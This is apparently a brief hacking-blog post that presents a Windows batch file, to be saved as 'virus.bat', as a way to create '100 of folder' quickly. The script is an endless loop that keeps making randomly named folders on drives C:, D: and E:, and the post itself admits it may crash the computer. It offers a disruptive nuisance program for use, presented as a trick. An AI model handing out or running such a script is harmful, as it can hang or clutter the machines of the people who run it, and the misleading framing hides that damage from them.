!--Start of Tawk.to Script-->

HOW TO CREATE 100 OF FOLDER IN A MINUTES USING NOTE PAD

Step 1: Open Notepad

Step 2: Copy the Following Code and paste it in notepad then Save it as “virus.bat”. [you can also save with different name but extension must be .bat]

@echo off
:VIRUS
cd /d C:
md %RANDOM%
cd /d D:
md %RANDOM%
cd /d E:
md %RANDOM%
goto VIRUS
REM #######################
REM mikehacks.blogspot.in

Step 3: Run it... Beware it may crash your PC due to heavy load, Use at your own risk....

0 comments: